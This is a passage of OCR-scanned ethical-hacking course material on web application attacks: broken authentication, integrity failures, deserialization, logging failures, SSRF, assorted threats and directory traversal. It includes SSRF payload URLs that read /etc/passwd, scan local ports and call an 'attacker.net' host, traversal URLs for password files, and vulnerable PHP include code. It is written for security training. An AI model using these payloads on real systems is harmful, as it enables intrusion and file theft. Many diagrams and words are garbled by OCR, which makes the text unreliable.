A ll Rights Reserv ed , Reproduction is Strictly Prohibited ,
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

A07 - Identification and Authentication Failures/Broken

Authentication

Attackers can exploit vulnerabilities in identification, authent ication or session managementfunctions such as
exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, and account
update to impersonate users

Session ID in URLs Password Exploitation Timeout Exploitation

http : //www.cartifiadhackarshop . com/sa
l e / salei tams=304 ; jsas sionid=l 20MTOIDP
XM00QSABGCKLHC.nJN2JV?dast=NewMe xico
e Attackers sniff the network traffic or
trick users to get session IDs and t hen
reuse those session IDs for malicious
purposes
e Attackers can gain access to a
web application 's password
database. If user passwords are
not encrypted, an attacker can
exploit any user's password
e If an application's t imeouts are not
set properly and a user closes their
browser without logging out from
sites accessed through a public
computer, an attacker can use the
sa me browser later and exploit
that user's privileges

r- Copynght CJ by iC-C1uncil All Rights Reserved Reproduction IS Stnctly Proh1b1ted

A07 - Identification and Authentication Failures/Broken Authentication

Identification, authentication, and session management include every aspect of user
authentication and management of active sessions. At present, web applications implementing
robust authentication mechanisms fail because of weak credential functions such as "change
my password," "forgot my password," "remember my password," and "account update."
Therefore, developers must take the utmost care when implementing user authentication
securely. It is always preferable to use strong authentication methods through special software-
and hardware-based cryptographic tokens or biometrics. To impersonate users, an attacker
exploits vulnerabilities in the authentication or session management functions such as exposed
accounts, session IDs, logout, password management, timeouts, remember me, secret
question, account update, and others.
• Session ID in URLs
o Example:
A web application creates a session ID when a user logs into
http:// certifiedhackershop. com. An attacker uses a sniffer to sniff the
cookie that contains the session ID or tricks the user into disclosing the session ID.
The attacker now enters the following URL in their browser's address bar:
http://certifiedhackershop.com/sale/saleitems=304;jsessio
nid=12OMTOIDPXM0OQSABGCKLHCJUN2JV?dest=NewMexico
This redirects the attacker to the already logged in page of the victim. Thus, the
attacker successfully impersonates the victim.
If session IDs are exposed in the URL, then the web application is vulnerable to session
fixation attacks.

Module 14 Page 1939 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

■ Password Exploitation

For authenticating a user, every web application employs a user identification method
such as an ID and a password. Attackers can identify passwords stored in databases
because of weak hashing algorithms. Further, attackers can gain access to the web
application's password database if user passwords are not encrypted, which allows the
attackers to exploit every user's password. Once attackers compromise a system, they
can perform various malicious activities such as session hijacking and user
impersonation.
■ Timeout Exploitation

If the session timeout is long and the session IDs are not changed after every login,
attackers may hijack a session and take control of it with the same privileges as the
victim. If an application's session timeouts are set to long durations, the sessions will
last until the time specified, that is, the session will be valid for a long period . When the
user closes the browser without logging out from sites accessed through a public
computer, the attacker can use the same browser later to conduct the attack, as
sessions IDs can remain valid; thus, they can exploit the user's privileges.
o Example:

A user logs into www.certifiedhacker.com using their credentials. After performing

certain tasks, they close the web browser without logging out of the page. The web
application's session timeout is set to 2 h. During the specified session interval, if an
attacker has physical access to the user's system, they may then launch the browser,
check the history, and click the www.certifiedhacker.com link, which automatically
redirects the attacker to the user account without the need to enter the user
credentials.

Module 14 Page 1940 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

A08 - Software and Data Integrity Failures

Softwa re and data integ rity failures occur when organizations fail to update t he applications' softwa re wit h the lat est versions
or pat ches
Web applications rely on plugins, dependencies, libraries, or packages t hat ca n be installed from public repositories, content
deli very networks (CDNs), or untrusted sources, w hich makes t hem vulnera ble t o attacks
The common security weaknesses in this category include f uncti onality from an untrusted control sphere, the download of a
code without an integrity check, and the deserialization of untrusted data

Deve)oper Attacker U! er

0.

a
Installs malicious : Downloads and
~ installs m alicious
•
~
code into Cl/CD
pipeline .. ....••.. ..•. .••. . ..••.••.. ..••.••.. ..••.••....••...•. ..••... : e code

Source-Code
L +. ~. ~ EJt·1;; ; ,71
: ····························································; Application
Repository Cl/CD pipeline

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

AOB - Software and Data Integrity Failures

Software and data integrity failures occur when organizations fail to update the applications'
software with the latest versions or patches. Often, web applications rely on plugins,
dependencies, libraries, or packages that can be installed from public repositories, content
delivery networks (CDNs), or untrusted sources, which makes them vulnerable to attacks.
Most organizations implement automatic software update functionalities that update or patch
previously trusted applications without any verification. Therefore, developers must take the
utmost care in auditing the code, securing Cl/CD pipelines, and using third -party libraries from
trusted repositories. They should also ensure that serialized data are sent with encryption or
signatures. If the software is corrupted, it can cause great damage with abnormal behavior in
real-time environments or the exposure of application components.
The common security weaknesses in this category include the inclusion of functionalities from
an untrusted control sphere, download of code without integrity checks, and deserialization of
untrusted data.
The following are some exploits that can be performed using software and data integrity
failures:
■ Cache poisoning
■ Code injection
■ Command execution
■ Denial of service
■ Data theft

Module 14 Page 1941 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Example
Attackers leverage the insecure Cl/CD pipeline of an organization to install and distribute
malicious code. The client unintentionally downloads and installs this software from the
organization's servers without validating its integrity. Now, attackers use the malicious code in

-
the client network to gain complete remote access.

~ •
...............Gains
.......remote
........access
.......via...malicious
...........code
............................~- ---
,..

Developer Attacker User

0.
A
Installs malicious : Downloads and
•
l
code into Cl/CD
e : installs malicious

S·· · · · ···. L.. . . . . . . .

pipeline • • •• • •• • ••• • • ••• • •• • ••• • • ••• ••• • • ••• • •• • ••• • • ••• • •• • • ••• • •• code

·I··• "'v";" ...... ·G ·. t·······•I~;;;;, ?I

Source-Code Application
Repository Cl/CD pipeline

Figure 14.26: Scenario of software and data integrity failure

Module 14 Page 1942 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Insecure Deserialization
Employee
Data se rialization and
deserial izat ion is an
effective process of
linearizing and de-
linearizing data objects N ame Age City EmplD

for transmission to other Attacker

Rinni 26 Nevada 220 1
networks or systems I Injects malici ous code in

Attackers inject malicious

Serialization t serialized data

code into serialized data <Enployee><Name>Rinni</Na.ma><Aga>26<./Age><City> <Enpl oyee><Name>Rinni</ Name><Age>26</Age><City>Nevada

and forwa rd t he malicious Nevada </City><EnpID>2201</EnpIDX / Enployee> </City><EnpID>2201 < / EnpID >MALICIOUS PRO:EOORE</Empl oyee>

seria lized data to the

victi m

Insecure deserialization
De serialization ! Insecure
Deserialization ♦
I
deserializes t he malicious Employee Employee I......~ Malicious
Proce dure
seria lized content along Hack
with the injected
malicious code,
J,:.•············~::.:.:? \:::~··············~
compromisi ng t he system N ame Age City EmplD Name Age City Em plO
or net work
Rinni 26 Nevada 2201 Rinni 26 Nevada 2201

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

Insecure Deserialization
As data in the computer is stored in the form of data structures (graph, trees, array, etc.), data
serialization and deserialization is an effective process for linearizing and de-linearizing data
objects to transport them to other networks or systems.
■ Serialization

Consider an example of an object " Employee" (for JAVA platform), where the Employee
object consists of data such as name, age, city, and EmplD. Due to the process of
serialization, the object data will be converted into the following linear format for
transportation to different systems or different nodes of a network.
<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada</City><ErnpID>2201
</EmpID></Ernployee>

Module 14 Page 1943 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Employee

Name Age City EmplD

Rinni 26 Nevada 2201

Serialization

<EmployeeXName>Rinni</Name><Age>26</AgeXCity>
Nevada</CityXEmpID>2201</EmpIDX/Employee>

Figure 14.27: Serialization process

■ Deserialization

Deserialization is the reverse process of serialization, whereby the object data is

recreated from the linear serialized data . Due to the process of deserialization, the
serialized Employee object given in the abovementioned example will be reconverted
into the object data as shown in the figure below:

<Employee><Name>Rinni</Name><Age>26</AgeXCity>
Nevada</CityXEmpID>2201</EmpIDX/Employee>

Deserialization

Employee

Name Age City EmplD

Rinni 26 Nevada 2201

Figure 14.28: Deseri alization process

Module 14 Page 1944 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ Insecure Deserialization
This process of serialization and deserialization is effectively used in communication
between networks, and its widespread usage attracts attackers to exploit the flaws in
this process. Attackers inject malicious code into serialized linear formatted data and
forward the malicious serialized data to the victim. An example of malicious code
injection into serialized linear data by the attacker is shown below:
<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada
</City><EmpID>2201</EmpID>MALICIOUS PROCEDURE</Employee>

Due to insecure deserialization, the injected malicious code will be undetected and
remain present in the final execution of the deserialization code. This results in the
execution of malicious procedures along with the execution of serialized data, as shown
in the following figure:

Attacker
I Injects malicious code in
t serialized data

<Ernployee><Name>Rinni</Name><Age>26</AgeXCity>Nevada
</CityXErnpID>2201</ErnpID>MALICIOUS PROCEDURE</Ernployee>

Insecure
Deserialization

___.l ..... ·►
Malicious
..____E_m_p,..lo..,.y_e_e_
......... Procedure

.. .. ...•· ..... ·.... ·•.......

•• ♦ • • • Hack

... .. ... ... .....

~·· ~ ,:.a ··.A
Name Age City EmplD

Rinni 26 Nevada 2201

Figure 14.29: Insecure Deserialization attack

This could have a severe impact on the system, as it would authorize the attacker to
execute and run systems remotely. Moreover, any software or server vulnerable to
deserialization attacks could be adversely affected.

Module 14 Page 1945 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

A09 - Security Logging and Monitoring Failures/Insufficient

Logging and Monitoring
Web applications maint ain logs to t rack usage patterns, such as user an d admin login credentials
Security logging and monitoring failures cover application weakn esses such as insufficient logging, improper output
neutralization for logs, exclusion of security-relevant Information, and addit ion of sensitive information to log files

Insufficient logging and mo nitoring refer t o the scenario w here t he detection software either does not record the
malicious event or ignores important detai ls about the event
Attackers usually inject, delete, or tamper the web applicat ion logs to engage in malicious activities or hide their
identities

·-- ~~-'!~~~~~-~-~-~~p~~-- >

···························>
........................ > Gain a ccess to
......................... ·> confidential data

···························> ...~.i~~~-~i-~!2~!~~~-- ►
···························>
···························>
Attacker ···························> Database
···························>
Web application with insufficient Logging

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

A09 - Security Logging and Monitoring Failures/Insufficient Logging and

Monitoring
Web applications maintain logs to track usage patterns, such as user and admin login
credentials. Security logging and monitoring failures cover application weaknesses such as
insufficient logging, improper output neutralization for logs, exclusion of security-relevant
Information, and addition of sensitive information to log files.
Insufficient logging and monitoring refer to scenarios in which the detection software either
fails to record a malicious event or ignores important details about the event. Attackers usually
inject, delete, or tamper with web application logs to engage in malicious activities or hide their
identities. Insufficient logging and monitoring make the detection of malicious attempts of the
attacker difficult, and the attacker can perform malicious attacks such as password brute-
forcing to steal confidential passwords .

•.•i:-'!?!i.c!?~.s.~.t.t.~~~!~.. ~
·························:>
·························:> Gain access to
confident ial dat a
·························:> without being noticed
·························:> ···························!>-
·························:>
·························:>
Attacker ·························:> Database
·························:>
Web application with insufficient Logging

Figure 14.30: Attack on a web application wit h insufficient logging and monitoring

Module 14 Page 1946 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

Given below are a few causes of security logging and monitoring failures:
• Logs that do not provide information about overall logins, failed login attempts, and
important transactions.
• Warnings and error messages that provide vague and insufficient log information.
• Inappropriate monitoring of applications and API logs.
■ Local storage of logs.
■ Improper or no implementation of response escalation processes.
• Dynamic application security testing (DAST) tools such as OWASP ZAP that fail to
generate alerts.
• Web applications that are not capable of detecting, escalating, or issuing alerts of
suspicious activities in real time.

Module 14 Page 1947 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

AlO- Server-Side Request Forgery (SSRF)

Attackers exploit SSRF vulnerabilities in a public web server to send crafted requests to the internal or backend servers

Once the attack is successful, the attackers can perform various activities such as port scanning, network scanning, IP address
discovery, reading web server files, and bypassing host-based authentication

• •·· •· •• •· •· • •• •:Y ~ Web Server

ef\os
cJ'l>~e
ues\
u'O\,c. •••••
3'0\e ~\ •• • ·
e'< ••·•·•
O,'<e« • .,e'<... . . . • ·
•••• •
~
· ·••• •
. . .. . .
-· /:!..
:
:
e
e:, .,.v.\f\e'< ••••• •• •• • '( lnternalserver : : Webserversends
........ ...... ••: a.\\3c.~e responds with : : the request on

o··· ...
\O\~:•• •••••
•••• •••• \O \'(\ data : " b h If f h
'Oat¥- • ~ ea O t euser

& .~:~: : : : : ·_·: : : :'.~~··-►

- - Firewall blocks direct
E::
Internal
Attacker communication with Firewall Database Server
the internal server

r- Copynght CJ by iC-C1uncil All Rights Reserved Reproduction IS Stnctly Proh1b1ted

AlO- Server-Side Request Forgery (SSRF) (Cont'd)

Injecting an SSRF Payload Cross-Site Port Attack (XSPA)

It involves selecting a parameter and inserting an XSPA allows attackers to scan for the open ports
SSRF payload that can support a file or URL. of a server

Examples: Attackers can use scanned ports such as Ports 21,

e Gaining access to internal resources 22, and 25, along with the loopback interface

Attackers can gain access to internal resources

Examples:
through the /admin panel from the interna l
network. It allows them to access the files from the e https ://www . certifiedhacker . com/page?u
server via the fi l e: //path/to/file schema rl=http ://l ocalhost:22/
e Gaining access to internal pages
e h t tp s : //www . certifiedhac ker . com/page?u
h ttps://www . cer t ifiedhacker .com/page?u r l=http://127 . 0 .0. 1 :25/
rl=http ://127 . 0.0 . l /admin
e https ://www . c erti fiedha cke r . com/page ?u
e Using a URL scheme to access internal files
r l=http://127 .0. 0 . 1 :3389/
https ://www . certifiedhacker.com/page?u
r l =f i le ://etc/passwd

Copyright Cl by EC·CIUOCil All Rights Reserved Reproduction is Strictly Proh1b1ted

AlO-Server-Side Request Forgery (SSRF)

Attackers exploit server-side request forgery (SSRF) vulnerabilities, which evolve from the
unsafe use of functions in an application, in public web servers to send crafted requests to
internal or backend servers. Internal servers usually employ firewalls to prevent unwanted
traffic inflows to the network. Therefore, attackers leverage SSRF vulnerabilities in Internet-
facing web servers to gain access to backend servers that are protected by a firewall, VPN, or
access-control lists (ACLs). The backend server believes that the request is made by the web

Module 14 Page 1948 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

server because these servers are on the same network; consequently, the backend server
responds with the data stored in it.
SSRF vulnerabilities evolve in the following manner. Generally, server-side requests are initiated
to obtain information from an external resource and feed it into an application. For instance, a
designer can utilize a URL such as https://xyz.com/feed.php?urf=externalsite.com/feed/to to
obtain a remote feed. If attackers can alter the URL input to the localhost, then they can view
all the local resources on the server.
Once the attack is successful, attackers can perform various activities such as port scanning,
network scanning, IP address discovery, reading of web server files, bypassing of host-based
authentication, interaction with critical protocols, and remote code execution.

Web Server

Internal server :
.: Web server sends
responds with : : the request on
data : : behalf of the user

Internal
Attacker communication with Firewall
Database Server
the internal server

Figure 14.31: Illustration of an SSRF attack

Types of SSRF Attacks

■ Injecting an SSRF payload
This attack involves selecting a parameter and inserting an SSRF payload that can
support a file or URL. It allows attackers to make certain modifications to the header
field and change it to plaintext. The new payload is then inserted into the parameter in
place of a file.
o Gaining access to internal resources
Attackers can gain access to internal resources through the / admin panel from the
internal network. This allows them to access the files from the server via the
file:/ /path/to/file schema.
o Gaining access to internal pages
Attackers can use the following exploits to access internal pages :
• https://www.certifiedhacker . com/page?url=http://127.0 .
0.1/admin

Module 14 Page 1949 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

• https://www . certifiedhacker.com/page?url=http://127.0 .
0 . 1/pgadmin
• https://www.certifiedhacker.com/page?url=http://127.0 .
0.1/any_interesting_page
• https://www.certifiedhacker . com/page?url=http://127.0 .
0.1/phpmyadmin
o Using a URL scheme to access internal files

Attackers can access files by exploiting a URL scheme of a server. This helps them
further attack its internal services. The following exploits can be used by attackers to
access internal files :

• https://www.certifiedhacker . com/page?url=file://etc/pa
sswd
• https://www.certifiedhacker . com/page?url=file://\/\/et
c/passwd
• https://www . certifiedhacker . com/page?url=file:///etc/p
asswd
• https://www.certifiedhacker . com/page?url=file://path/t
o/file
o Using a URL scheme to access internal services
Attackers can connect to different internal services by using a URL scheme. Some of
the exploits that can be used for this purpose are as follows.

For FTP

• https://www.certifiedhacker . com/page?url=ftp://attacke
r.net:11211/
• https : //www.certifiedhacker.com/page?url=sftp://attack
er . net : 11111/
• https : //www.certifiedhacker . com/page?url=tftp://attack
er.net : 123456/TESTUDP
Exploiting LDAP

• https://www.certifiedhacker.com/page?url=ldap://127.0 .
O.l/ %0astats %0aquit
• https : //www . certifiedhacker . com/page?url=ldap://localh
ost:11211/ %0astats %0aquit
• Cross-Site Port Attack (XSPA)

This type of SSRF attack allows attackers to scan for the open ports of a server. Attackers
use a loopback interface of that server such as localhost or 127. 0. 0 .1.

Module 14 Page 1950 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Further, attackers can use scanned ports such as port 21, 22, and 25, along with the
loopback interface.
The following are some examples:
o https://www . certifiedhacker . com/page?url=http://localhost
:22/
o https : //www.certifiedhacker.com/page?url=http://127.0.0.1
:25/
o https://www.certifiedhacker . com/page?url=http://127 . 0 . 0 . 1
:3389/

Module 14 Page 1951 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

Other Web Application Threats

Im Directory Traversal
Jim Cookie Snooping
I L■ Platform Exploits
Jim Clickjacking Attack
J
[_m Unvalidated Redirects
and Forwards
l Gil:■ Hidden Field M anipulatio~ 1 ■11 Network Access Attackl I JavaScript Hijacking
l
Lm Watering Hole Attack
Jim Obfuscation Application
ll■ DMZ Protocol Attacks
H■ DNS Rebinding Attack
J
GIi■
lil Cross Site RequestForgej Denial-of-Service (DoS)
Lil Web-based Timing Attackj
II Same-Site Attack
J
Im Cookie/Session Poisoningj l■ Buffer Overflow
JL■ MarioNet Attack
1 Ii
Pass-the-cookie Attack J
11 ■
f■ Web Service Attacks
II ■ CAPTCHA Attacks RC4 NOMORE Attack

Copynght
l
Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

Other Web Application Threats

Web application threats are not limited to attacks based on URL and port 80. Despite using
ports, protocols, and OSI layers, vendors must protect the integrity of mission-critical
applications from possible future attacks by being able to deal with all attack methods.
The various types of web application threats are as follows:
• Directory Traversal

Attackers exploit HTTP by directory traversal, which gives them access to restricted
directories; they execute commands outside the web server' s root directory.
• Unvalidated Redirects and Forwards

Attackers lure victims into clicking on unvalidated links that appear to be legitimate.
Such redirects may attempt to install malware or trick victims into disclosing passwords
or other sensitive information. Unsafe forwards may allow access control bypass,
leading to
• Session Fixation Attack
• Security Management Exploits
■ Failure to Restrict URL Access
■ Malicious File Execution
■ Watering Hole Attack

It is a type of unvalidated redirect attack whereby the attacker first identifies th e most
visited website of the target, det ermin es the vulnerabilities in the website, injects

Module 14 Page 1952 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

malicious code into the vulnerable web application, and then waits for the victim to
browse the website. Once the victim tries to access the website, the malicious code
executes, infecting the victim.
■ Cross-Site Request Forgery
The cross-site request forgery method is a type of attack in which an authenticated user
is made to perform certain tasks on the web application that an attacker chooses, e.g., a
user clicking on a particular link sent through an email or chat.
■ Cookie/Session Poisoning
By changing the information inside a cookie, attackers bypass the authentication
process. Once they gain control over a network, they can modify its content, use the
system for a malicious attack, or steal information from users' systems.
■ Web Service Attacks
An attacker can get into the target web application by exploiting an application
integrated with vulnerable web services. An attacker injects a malicious script into a
web service and can then disclose and modify application data.
■ Cookie Snooping
Attackers use cookie snooping on victims' systems to analyze the users' surfing habits
and sell that information to other attackers or to launch various attacks on the victims'
web applications.
■ Hidden Field Manipulation
Attackers attempting to compromise e-commerce websites mostly perform such
attacks. They manipulate hidden fields and change the data stored in them. Several
online stores face such problems every day. Attackers can alter prices and conclude
transactions, designating prices of their choice.
■ Obfuscation Application
Attackers are usually careful to hide their attacks and avoid detection. Network and
host-based intrusion detection systems (IDSs) constantly look for signs of well-known
attacks, driving attackers to seek different ways to remain undetected. The most
common method of attack obfuscation involves encoding portions of the attack with
Unicode, UTF-8, Base64, or URL encoding. Unicode is a method of representing letters,
numbers, and special characters to properly display them, regardless of the application
or underlying platform.
■ Denial-of-Service (DoS)
A DoS attack is an attack on the availability of a service, which reduces, restricts, or
prevents access to system resources by its legitimate users. For instance, a website
related to a banking or email service may not able to function for a few hours or even
days, resulting in the loss of time and money.

Module 14 Page 1953 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ Buffer Overflow

A web application's buffer overflow vulnerability occurs when it fails to guard its buffer
properly and allows writing beyond its maximum size.
■ CAPTCHA Attacks

CAPTCHA is a challenge-response type of test implemented by web applications to

check whether the response is generated by a computer. Although CAPTCHAs are
designed to be unbreakable, they are prone to various types of attacks.
■ Platform Exploits

Users can build various web applications using different platforms such as BEA
Weblogic and Cold Fusion. Each platform has various vulnerabilities and exploits
associated with it.
■ Network Access Attacks

Network access attacks can majorly affect web applications, including a basic level of
service. They can also allow levels of access that standard HTTP application methods
cannot grant.
■ DMZ Protocol Attacks

The demilitarized zone (DMZ) is a semi-trusted network zone that separates the
untrusted Internet from the company's trusted internal network. An attacker who can
compromise a system that allows other DMZ protocols has access to other DMZs and
internal systems. This level of access can lead to
o Compromise of the web application and data
o Defacement of websites
o Access to internal systems, including databases, backups, and source code
■ Web-based Timing Attacks
Web-based timing attacks exploit side-channel leakage and estimate the amount of time
taken for secret key operations. Attackers perform these attacks to retrieve usernames
and passwords for accessing web applications.
■ MarioNet Attack

Attacker abuse the Service Workers API to inject and run malicious code in the victim's
browser to perform various attacks such as cryptojacking, DDoS, click fraud, and
distributed password cracking.
■ RC4 NOMORE Attack

A Rivest Cipher Numerous Occurrence MOnitoring and Recovery Exploit (RC4 NOMORE)
attack is an attack against the RC4 stream cipher. This attack exploits the vulnerabilities
present in a web server that uses the RC4 encryption algorithm for accessing encrypted
sensitive information. Attackers use RC4 NOMORE to decrypt the web cookies secured
by the HTTPS protocol and inject arbitrary packets. After stealing a valid cookie, the

Module 14 Page 1954 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

attacker impersonates the victim and logs into the website using the victim's credentials
to perform malicious activities and unauthorized transactions.
• Clickjacking Attack
In clickjacking, the attacker loads the target website inside a low opacity iframe. Then,
the attacker designs a page such that all the clickable items such as buttons are
positioned exactly as on the selected target website. When the victim clicks on the
invisible elements, the attacker performs various malicious actions.
■ JavaScript Hijacking
JavaScript hijacking, also known as JSON hijacking, is a vulnerability that enables
attackers to capture sensitive information from systems using JavaScript Objects (JSON)
as a data carrier. These vulnerabilities arise from flaws in the web browser's same-origin
policy that permits a domain to add code from another domain.
• DNS Rebinding Attack
Attackers perform DNS rebinding attacks to bypass the same-origin policy's security
constraints and communicate with or make arbitrary requests to local domains through
a malicious web page.
■ Same-Site Attack
A same-site attack occurs when an attacker hosts a malicious website on the subdomain
of a legitimate application for tricking users into navigate to a malicious website, from
which the attacker can collect sensitive data of the users.
■ Pass-the-Cookie Attack
The pass-the-cookie attack allows attackers to access a web application without
providing user credentials. Attackers steal cookies from th e target user's browser and
inject those cookies into their session to bypass the authentication at the target server.

Module 14 Page 1955 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Directory Traversal

a Directory traversa l allows attackers to access restricted directories, including application source code, configuration, and
crit ical syst em fil es to execut e commands outsi de the web server's root application direct ory

El Attackers ca n manipulate variables t hat refe rence fi les with "dot-dot-slash( ../)" sequences and its variations

II Accessing files loca ted outsi de the web publishing directory using directory t rave rsal

e h t tp : //www .certifiedha c k er .co m/pr ocess .aspx?page = .. / .. / .. / . . /some dir/ s ome file
II e http://www. c ertified.hac k e r. com/ . . / .. / .. / .. /sorre dir /sane file

http://www.certifiedhacke r.com/GET/process.php./. ./../ ../

../ ../ ../ ../ ../ etc/passwd
.........................................................
: <?php :
: $thana ,. •Jason. p hp '; :
-~~~~~~~!~~~i~~- ~:!"~.r.e.'1.u.e~!••►
···················!> ~ : i f
:
( is_ set( $_ COCICIE( ' THEME ' J )
$thana =$ cxxncrE [ 'THEME ' J;
) :
:
<1:··························
Se rve r responds with
<1:····················· ~ : i ncluda ( - :
: "/hana/users/certifiedhackar/ Jason/" . :
password files
Attacker :································· .. ······· .. ········································: Server ~ .$ t.hana• •) ; ?>• •• ••• • •• • • • •• • • • • · ···· · • · • ••• •• •• • • •• ~
: root:a98b24a1d3e8:0 :1:System Operator:/:/bin/ksh : Vulnerable Server Code
: daemon:•:t :1::/tmp: :
~ Jason:a3b698a76f7 6dS 7 .:182:100:0e velo per:/ho me/users/Jason/ :/bin/csh :
·...................................................................................:
Copynght Cl by EC-Ctuncil All Rights Rese ive d Reproduction is Strictly Prohibite d

Directory Traversal
When access is provided outside a defined application, there exists the possibility of
unintended information disclosure or modification . Complex applications are configured with
multiple directories that exist as application components and data . An application can traverse
these directories to locate and execute the legitimate portions of an application. A directory
traversal/forceful browsing attack occurs when the attacker is able to browse the directories
and files outside the normal application access. Such an attack exposes the directory structure
of an application and often the underlying web server and operating system . Directory traversal
allows attackers to access restricted directories, including application source code,
configuration, and critical system files, and execute commands outside the web server's root
directory. With this level of access to web application architecture, an attacker can
■ Enumerate the contents of files and directories
■ Access pages that otherwise require authentication (and possibly payment)
■ Gain secret knowledge of the application and its construction
■ Discover user IDs and passwords stored in hidden files
■ Locate source code and other interesting files left on the server
■ View sensitive data such as customer information
Example:

The following example uses " ../" to go back to several directories and obtain a file containing
the backup of a web application :
http://www.targetsite.com/ ../../../sitebackup.zip

Module 14 Page 1956 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved . Reproduct ion is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

This example obtains the "/etc/passwd" file from a UNIX/Linux system, which contains user
account information:
http://www.targetsite.com/ .. / ../. ./. ./etc/passwd
Let us consider another example in which an attacker tries to access files located outside a web
publishing directory using directory traversal:
http://www.certifiedhacker.com/process.aspx?page= .. / .. / .. / .. /some dir/some file
http://www.certifiedhacker.com/.. / .. / .. / .. /some dir/some file
http:/ / www.certifiedhacke r.com/GET/ process. php./../ .. / ../

... .... . .... . . w

../ ../ ../ .. / ../ etc/passwd
: < ?php

.~~•_a.c~;~ ~;~.d)~~•~~;,';.~~",~'. •:> ....................:> ~

: $theme = 'Jason.php ';
! if ( i s set ( $ COOKIE [ THEME'] 1
) )

~ .... ~·:~~~ ~~;~~~~~·~;;,; ·... ~ : $th~e = $ COOKIE [ ' THEME ' ] ;

! include ( -
: n/ home/users / certifiedhacker/ Jason / 11

password files ! $theme) ;?>

Attacker ········· · · · · · ........ ...................... ........ . ... ..................... . . Server , ••• • • •• •• •• •• •• •••• ■ ■ ■ ■ ■ •• •• •• ••• •••• ••• •• ■ •••• ■ ■ ■ ■

root:a98b24al d3e8:0:l:System Operator:/:/bln/ksh Vulnerable Server Code

daemon:•:1:1::/tmp:
Jason:a3b698a 76f76dS7.:182:100:Developer:/home/users/Jason/ :/bin/csh
...............................................................................
Figure 14.32: Directory Traversal at tack example

Module 14 Page 1957 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Ethical Hacker
Hacking Web Applications

Unvalidated Redirects and Forwards

